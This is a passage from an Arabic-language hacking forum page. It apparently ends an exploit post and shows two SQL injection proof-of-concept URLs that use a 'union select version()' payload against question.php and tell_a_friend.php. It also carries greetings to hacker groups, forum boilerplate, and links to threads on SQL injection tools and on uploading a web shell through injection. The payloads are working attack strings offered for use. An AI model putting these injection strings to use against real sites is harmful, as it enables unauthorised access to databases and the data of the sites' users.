http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)
 
########################################################################################
Thanks cyber-warrior.org  &  e-banka.org AKINCILAR
######################################################################################## 
التوقيع

^_^



 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection KaLa$nikoV SQL قواعد البيانات 127 05-03-2017 08:12 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث} Master vbspiders SQL قواعد البيانات 280 08-24-2015 04:10 AM
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection Black-FoG SQL قواعد البيانات 73 03-14-2014 09:08 PM
[Style] : ¨°•√♥ كل عام وانتم بخير العيدية استايل العيد الازرق الاحترافي من سنبوك لتصميم ♥√•°¨ support قسم ستآيلات الـ vB 0 09-18-2009 11:52 PM


الساعة الآن 10:32 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0